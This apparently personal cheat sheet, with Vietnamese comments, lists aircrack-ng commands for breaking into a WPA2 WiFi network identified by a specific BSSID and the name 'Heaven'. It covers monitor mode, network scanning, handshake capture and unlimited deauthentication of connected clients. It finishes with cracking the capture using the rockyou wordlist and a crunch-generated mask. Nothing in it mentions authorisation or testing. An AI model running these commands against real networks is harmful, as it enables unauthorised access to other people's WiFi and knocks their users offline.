sudo airmon-ng check kill

sudo airmon-ng start wlan0


sudo airodump-ng wlan0mon
bắt tất cả các WiFi trong vùng phủ sóng.

 F0:51:36:71:45:A7  -38       65        9    0   1  130   WPA2 CCMP   PSK  Heaven

sudo airodump-ng wlan0mon -d F0:51:36:71:45:A7
theo dõi một mạng có BSSID và channel đã biết.


sudo airodump-ng -w hack1 -c 1 --bssid F0:51:36:71:45:A7 wlan0mon

-- airodump-ng -c 1 -w Save_File --bssid F0:51:36:71:45:A7 wlan0 


sudo aireplay-ng --deauth 0 -a F0:51:36:71:45:A7 wlan0
sudo aireplay-ng -0 5 -a F0:51:36:71:45:A7 wlan0

aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
crunch 9 9 -t vina@@@@@ vinaaaaaa | aircrack-ng -w - Save_File-01.cap -e Heaven